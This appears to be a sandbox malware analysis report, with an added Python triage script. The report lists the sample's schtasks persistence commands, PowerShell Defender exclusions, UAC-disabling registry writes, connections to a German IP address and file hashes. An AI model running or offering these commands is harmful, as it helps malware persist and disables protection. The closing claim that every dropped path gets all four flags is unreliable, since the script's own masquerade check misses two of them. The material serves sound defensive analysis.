| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe
"C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 7 /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\spoolsv.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\Users\Default\Templates\System.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\Default\Templates\System.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Templates\System.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\winlogon.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\MSOCache\All Users\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Media Player\fr-FR\dllhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\fr-FR\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Media Player\fr-FR\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\smss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Sidebar\fr-FR\smss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\fr-FR\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Sidebar\fr-FR\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "192f0f1221e376146e725a4d23ee69a01" /sc MINUTE /mo 12 /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\192f0f1221e376146e725a4d23ee69a0.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "192f0f1221e376146e725a4d23ee69a0" /sc ONLOGON /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\192f0f1221e376146e725a4d23ee69a0.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "192f0f1221e376146e725a4d23ee69a01" /sc MINUTE /mo 12 /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\192f0f1221e376146e725a4d23ee69a0.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\spoolsv.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\MSOCache\All Users\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "192f0f1221e376146e725a4d23ee69a01" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\192f0f1221e376146e725a4d23ee69a0.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "192f0f1221e376146e725a4d23ee69a0" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\192f0f1221e376146e725a4d23ee69a0.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "192f0f1221e376146e725a4d23ee69a01" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\192f0f1221e376146e725a4d23ee69a0.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 8 /tr "'C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\spoolsv.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Templates\System.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\winlogon.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Media Player\fr-FR\dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\smss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Sidebar\fr-FR\smss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\192f0f1221e376146e725a4d23ee69a0.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\spoolsv.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\csrss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\192f0f1221e376146e725a4d23ee69a0.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe'
C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe
"C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\02e82330-10e4-4d69-9ac7-ae20e57401a6.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\000a36eb-8f05-429d-855f-89b30d664d3d.vbs"
C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe
"C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3ad17da4-5d28-4cd3-a423-197244fd6b37.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\84943063-e335-42af-b71f-b023053a5e6b.vbs"
C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe
"C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0b4bf8ee-f19c-4b34-b84f-556cf4df2999.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0f95aca8-b736-4c7b-86e9-e0f13a37da05.vbs"
C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe
"C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3e482dfe-79c2-45b2-844d-0acd5076dd8a.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a2e8eb5e-cd31-40f9-81bc-38767d6b7880.vbs"
C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe
"C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\071b134e-531d-47df-b1b7-f33365a13a85.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cc235d5d-142a-4fc2-a493-2f9f613403bc.vbs"
C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe
"C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3b3cfbd5-f0bf-4992-ad0e-9d99381e32ea.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\773797a4-d74c-4eff-bdd0-ddc240bd6cca.vbs"
C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe
"C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9aa2486c-af8f-4add-bc44-5514dd129b38.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e97fc3e9-eb6c-4165-a7b0-564e1470c976.vbs"
C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe
"C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\35759043-3256-4dbb-a295-53a22ceb79d6.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\95a67844-932d-4545-8d20-5741a0100290.vbs"
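The "System policy modification" table and the process list above show one repeated pattern per dropped file: a copy of the dropper is written under a system-binary name (smss.exe, csrss.exe, winlogon.exe, spoolsv.exe, dllhost.exe, audiodg.exe) into a directory where no such binary belongs, two or three scheduled tasks point at it (an ONLOGON task at /rl HIGHEST plus MINUTE-interval re-launch tasks), a Defender path exclusion is added for the same path, and EnableLUA, ConsentPromptBehaviorAdmin and PromptOnSecureDesktop are all set to 0. The Python below is an added triage example, not part of this report or of any sandbox tooling: it parses those three line shapes and correlates them per target path so the chain is visible at a glance. SAMPLE_LINES are a handful of lines copied from this report as constructed input; SYSTEM_NAMES, the 15-minute interval threshold and the flag names are the example's own assumptions.

```python
"""
Triage helper for the process list and policy table above: parses schtasks
/create command lines, Add-MpPreference exclusions and UAC policy registry
writes, then correlates them into one persistence chain per target path.
Added example, not sandbox code; SAMPLE_LINES are copied from this report.
"""
import re
from collections import defaultdict

# Windows system-binary names the sample reuses; genuine copies live in System32 (assumed list).
SYSTEM_NAMES = {"smss.exe", "csrss.exe", "winlogon.exe", "spoolsv.exe",
                "dllhost.exe", "audiodg.exe", "lsass.exe", "svchost.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Policies\System values whose "0" setting disables or weakens UAC prompting.
UAC_WEAKENING = {"EnableLUA": "0", "ConsentPromptBehaviorAdmin": "0",
                 "PromptOnSecureDesktop": "0"}

SCHTASKS_RE = re.compile(
    r'/create\s+/tn\s+"(?P<name>[^"]+)"\s+/sc\s+(?P<sched>\w+)'
    r'(?:\s+/mo\s+(?P<mod>\d+))?\s+/tr\s+"\'?(?P<target>[^\'"]+)\'?"', re.IGNORECASE)
EXCLUSION_RE = re.compile(r"Add-MpPreference\s+-ExclusionPath\s+'(?P<path>[^']+)'", re.IGNORECASE)
POLICY_RE = re.compile(r'(?P<key>.+)\\(?P<value>\w+) = "(?P<data>[^"]*)"$')

def parse_schtask(cmdline):
    """Return name/schedule/interval/target/highest for a schtasks /create line, else None."""
    m = SCHTASKS_RE.search(cmdline)
    if not m:
        return None
    return {"name": m["name"], "sched": m["sched"].upper(),
            "mod": int(m["mod"]) if m["mod"] else None, "target": m["target"],
            "highest": re.search(r"/rl\s+HIGHEST", cmdline, re.IGNORECASE) is not None}

def parse_exclusion(cmdline):
    """Return the path passed to Add-MpPreference -ExclusionPath, else None."""
    m = EXCLUSION_RE.search(cmdline)
    return m["path"] if m else None

def parse_policy_row(row):
    """Parse a '| Set value (int) | <key>\\<value> = "<data>" | <process> | ... |' table row."""
    cells = [c.strip() for c in row.strip().strip("|").split("|")]
    if len(cells) < 3 or cells[0] != "Set value (int)":
        return None
    m = POLICY_RE.match(cells[1])
    if not m or not m["key"].lower().endswith("\\policies\\system"):
        return None
    return {"value": m["value"], "data": m["data"], "process": cells[2],
            "weakens_uac": UAC_WEAKENING.get(m["value"]) == m["data"]}

def masquerades_as_system_binary(path):
    """True when a System32 binary name is used for a file outside the system directories."""
    low = path.lower()
    return low.rsplit("\\", 1)[-1] in SYSTEM_NAMES and not low.startswith(SYSTEM_DIRS)

def triage(lines):
    """Group tasks and exclusions by target path; collect UAC-weakening registry writes."""
    chains = defaultdict(lambda: {"tasks": [], "defender_excluded": False, "masquerade": False})
    uac_writes = []
    for line in lines:
        task = parse_schtask(line)
        if task:
            chain = chains[task["target"].lower()]
            chain["tasks"].append(task)
            chain["masquerade"] = masquerades_as_system_binary(task["target"])
            continue
        excluded = parse_exclusion(line)
        if excluded:
            chains[excluded.lower()]["defender_excluded"] = True
            continue
        policy = parse_policy_row(line)
        if policy and policy["weakens_uac"]:
            uac_writes.append(policy)
    return {"chains": dict(chains), "uac_writes": uac_writes}

def flags(chain):
    """Findings for one persistence chain, in a fixed order (flag names are the example's own)."""
    out = []
    if any(t["highest"] for t in chain["tasks"]):
        out.append("runs-highest")
    if any(t["sched"] == "MINUTE" and t["mod"] is not None and t["mod"] <= 15 for t in chain["tasks"]):
        out.append("minute-interval")
    if chain["masquerade"]:
        out.append("system-name-outside-system32")
    if chain["defender_excluded"]:
        out.append("defender-exclusion")
    return out

# Constructed sample: a subset of the process and registry lines from this report.
SAMPLE_LINES = [
    r"""schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 7 /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\spoolsv.exe'" /f""",
    r"""schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\spoolsv.exe'" /rl HIGHEST /f""",
    r"""schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\MSOCache\All Users\winlogon.exe'" /rl HIGHEST /f""",
    r"""schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 8 /tr "'C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe'" /rl HIGHEST /f""",
    r""""powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\spoolsv.exe'""",
    r""""powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe'""",
    r"""| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |""",
    r"""| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |""",
]

if __name__ == "__main__":
    result = triage(SAMPLE_LINES)
    for path, chain in result["chains"].items():
        print(f"{path}\n    {', '.join(flags(chain)) or 'no findings'}")
    for w in result["uac_writes"]:
        print(f"UAC weakened: {w['value']}={w['data']} by {w['process']}")
```

Run against the full process list, every one of the eleven dropped paths comes back with all four flags, which is the quickest way to confirm that the scheduled tasks, the Defender exclusions and the Program Files / Recovery / MSOCache file drops all belong to the same actor rather than to unrelated activity. The same parsers work on schtasks and PowerShell command lines from Sysmon Event ID 1 or EDR process telemetry, since the report reproduces them verbatim.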
Network
| Country | Destination | Domain | Proto |
| DE | 46.3.197.86:80 | | tcp |
| DE | 46.3.197.86:80 | | tcp |
| DE | 46.3.197.86:80 | | tcp |
| DE | 46.3.197.86:80 | | tcp |
| DE | 46.3.197.86:80 | | tcp |
| DE | 46.3.197.86:80 | | tcp |
| DE | 46.3.197.86:80 | | tcp |
| DE | 46.3.197.86:80 | | tcp |
| DE | 46.3.197.86:80 | | tcp |
| DE | 46.3.197.86:80 | | tcp |
| DE | 46.3.197.86:80 | | tcp |
| DE | 46.3.197.86:80 | | tcp |
| DE | 46.3.197.86:80 | | tcp |
| DE | 46.3.197.86:80 | | tcp |
| DE | 46.3.197.86:80 | | tcp |
| DE | 46.3.197.86:80 | | tcp |
Files
memory/2280-0-0x000007FEF5233000-0x000007FEF5234000-memory.dmp
memory/2280-1-0x0000000000F80000-0x000000000116A000-memory.dmp
memory/2280-2-0x000007FEF5230000-0x000007FEF5C1C000-memory.dmp
memory/2280-3-0x0000000000530000-0x000000000054C000-memory.dmp
memory/2280-7-0x0000000000BA0000-0x0000000000BAA000-memory.dmp
memory/2280-6-0x0000000000560000-0x0000000000576000-memory.dmp
memory/2280-5-0x0000000000550000-0x0000000000560000-memory.dmp
memory/2280-4-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2280-12-0x0000000000C50000-0x0000000000C62000-memory.dmp
memory/2280-10-0x0000000000C40000-0x0000000000C48000-memory.dmp
memory/2280-9-0x0000000000BB0000-0x0000000000BBC000-memory.dmp
memory/2280-13-0x0000000000E00000-0x0000000000E0C000-memory.dmp
memory/2280-15-0x000000001AE30000-0x000000001AE3E000-memory.dmp
memory/2280-18-0x000000001AEE0000-0x000000001AEEC000-memory.dmp
memory/2280-17-0x000000001AE50000-0x000000001AE5C000-memory.dmp
memory/2280-16-0x000000001AE40000-0x000000001AE48000-memory.dmp
memory/2280-14-0x000000001AE20000-0x000000001AE2A000-memory.dmp
memory/2280-8-0x000000001ADD0000-0x000000001AE26000-memory.dmp
C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\smss.exe
| MD5 | 192f0f1221e376146e725a4d23ee69a0 |
| SHA1 | 9500b9672eac1b1b2dee0e81f8b8efbb6d0d90ff |
| SHA256 | 019443010d028a6d5828afc530b1bd568e536afe32e715fe6a771f3ee1a3cc9d |
| SHA512 | daab36e062d27fd7a62607eb16a6013523fafabb31618e681feeae2fc92eb93d43c1f1a8051849aee4839d8b025ccf7227f5081847fd7b2c78e6f233f8d25a54 |
C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\spoolsv.exe
| MD5 | 1d34a4062408c41685f98d3552a8ac2d |
| SHA1 | 3fcc24ee7da60f71b563cf360a395178274d83fe |
| SHA256 | fde44434ca762a577c4f2840b3029eed88e91c41ec6ef2ae28473a6606035402 |
| SHA512 | 50b75e117397301f3acc1ae2f362cec75d061c45789011c57e0b3e2a8bbd4ce673f5bc081df3d64d589dbfb7ab95a297dd1a04804f39adc2c8b579f3e56018fa |
C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\smss.exe
| MD5 | c525e1d9ff51e646742e7c6403469529 |
| SHA1 | 28e5050a7657af750630854b5aced9c905ab7a2c |
| SHA256 | ba26c630cffe91736feb9c17258770bc9416828b8a3fd3feb30f2016aba1d6e1 |
| SHA512 | 9d62218b92b454620f654d305cddc86c04c978c60eb512735b56556928e1cacc270c7cea0065a09eee4a3e72a437f66c1c14d3f29788a38369d966803f80e5db |
C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\192f0f1221e376146e725a4d23ee69a0.exe
| MD5 | 4082314399ef9432f746d09ddeba93bd |
| SHA1 | 4365fa6112e0e6b5fb3b7c6ab1c08b79c8fa721b |
| SHA256 | ef58eeb4cf44148e62370990d952b04a8749f27bf1338a6cae4e91ea99049040 |
| SHA512 | d4c378d7500dd5bea61766f89cc699113cffdf69ad7541889c76be267e04da42eb7e9ba411b8be385ea2d1d74fa3c3468bfbe91f95b94751494810752cbb574d |
memory/1736-196-0x0000000002910000-0x0000000002918000-memory.dmp
memory/1740-195-0x0000000000980000-0x0000000000B6A000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | bb00fa18531eb39ea0f379e3ac0b5713 |
| SHA1 | 35806a59a3cfb75a8efa321b7d077e5702b08e44 |
| SHA256 | 54b5b1d9a6fd1db968e4792e52059e8a3cb682e99a0a467d0e0b3cd4dd507ec3 |
| SHA512 | 654fdbc7d0d6aed33a075fe422362f198d43735da004245bdf80591545dbea9d830bb092014c14cf8b7d84151a17e8bd92c15de216747611b431e41d84d713ef |
memory/2128-194-0x000000001B6C0000-0x000000001B9A2000-memory.dmp
memory/2280-234-0x000007FEF5230000-0x000007FEF5C1C000-memory.dmp
memory/1740-239-0x0000000000560000-0x0000000000572000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\000a36eb-8f05-429d-855f-89b30d664d3d.vbs
| MD5 | b76eb07a43724a1abd0f255b4a18ae54 |
| SHA1 | d432e154aaed126f85cbb0f9a6fb9e86ea6690b8 |
| SHA256 | 0dc17a8271ff4e59c2b9f03b0c92727cbf40428628b7779e3a9c2018dee2bd38 |
| SHA512 | a77412116a45e3498d0db7f008f7220777844b155fff6ebd946c07f155a553013c7b58e510cfbf9b2d4a17d565c94108e722ccbb5b47df09bdb91c6b3880629d |
C:\Users\Admin\AppData\Local\Temp\02e82330-10e4-4d69-9ac7-ae20e57401a6.vbs
| MD5 | 0d0d3de3358243b3f86178f207867bd4 |
| SHA1 | fad78c801830da5f828fecee992279f1186a0a60 |
| SHA256 | 63dc8e286131d64c43bb997a1f6285eaca66946cf31a213ea6166cfd1b53337a |
| SHA512 | 343c795fd3260ae434f80ac894c32139d25ab043967a0f6369a2481e1ec72f3647d28151ea762e6a0950eb6630fa8c9b592bebf3bcada62adb1ffd0925d85193 |
memory/1512-250-0x0000000000BF0000-0x0000000000DDA000-memory.dmp
memory/1512-251-0x0000000000BE0000-0x0000000000BF2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\3ad17da4-5d28-4cd3-a423-197244fd6b37.vbs
| MD5 | b6cc3157632624ad3ec1b198aea0db7d |
| SHA1 | 44ca5d291f8ad3e5367bc97deb3ed05b30101deb |
| SHA256 | 714e73935e73cc28c6ee37614b3c35c64d534b97336a88849e88f12a29e1af09 |
| SHA512 | a80f9c7664e9e11dabfd07a10bda576f9dbb6c4aa6bd2e405517d8c0fb8efbf105cf8622aefe42b9238f9df11189e1e1c9d6fc9016cf4617b79088389aa192ab |
memory/3036-263-0x0000000000250000-0x000000000043A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\0b4bf8ee-f19c-4b34-b84f-556cf4df2999.vbs
| MD5 | 4d27bcab7652be26e04e6c20efba3b06 |
| SHA1 | befd13c8a1e6bef14cba0c5132d55a2061324700 |
| SHA256 | ff0a44b592cfa886108b18a0bd313baa2af59a65909bb855d864fab6edefe7db |
| SHA512 | ad39822d324cc645db71b92af81c770dd86e56f2b8d900f058fcf68e0cd86ba9a07369d48b2e6876865f9a9f6a7ce70d8831e533400fd994b6fe798f0544f374 |
memory/2216-275-0x0000000001040000-0x000000000122A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\3e482dfe-79c2-45b2-844d-0acd5076dd8a.vbs
| MD5 | 6e9b538a9e02c38aa2477eb65f3b2720 |
| SHA1 | a0620edf4f3a4be162ffde2d998d690450119e52 |
| SHA256 | 49b595e6a4633b09c8d6fcfa079807333f98ab4ed1a8c08fa3f6f73b28facd23 |
| SHA512 | 102dbe7038494a4979bbc51c1a32eb35363315c69280e521e2b3805e832929f8b2ab47cdecf0ef6c6dd8babbc05070c7a57075e9f8bb46f9068b0d2fefe7680d |
C:\Users\Admin\AppData\Local\Temp\071b134e-531d-47df-b1b7-f33365a13a85.vbs
| MD5 | 1c1fb7e7eaff7a849c91a681e172598f |
| SHA1 | 9c8645b6bf491c9da40f4072758fedcc674317f7 |
| SHA256 | 815bee69e3790c16eee1f79cd0aebfd1935d1d80248664dd0b0d45672719675c |
| SHA512 | a4d37cbafef139cad93add21af4ebe0444b976de41ee498c4ed384627f4d1ce0c8bbe5548318a38ba016edf2456f8b1431d2e1df4507dff5cd0fc1b717dd1569 |
memory/1748-298-0x0000000001190000-0x000000000137A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\3b3cfbd5-f0bf-4992-ad0e-9d99381e32ea.vbs
| MD5 | ad6208c1c901a1458291f59bc3a660d7 |
| SHA1 | 77fcbabbc38d067960f2b8dac95c6c521b34ceb3 |
| SHA256 | 6fc1848997af117e009920bf33929ef8f2ea0e614c83f1f283d3ab2c0b6db012 |
| SHA512 | 08b955647310ce25b8d14f839df80244d21c3eb35c147596dd2bf6cf71691ff0c564eafe2ac47ab72edb118193fb6b404709c6c5b07f502c9c7ce55d0547b58a |
memory/2752-310-0x0000000001250000-0x000000000143A000-memory.dmp
memory/2752-311-0x0000000001240000-0x0000000001252000-memory.dmp
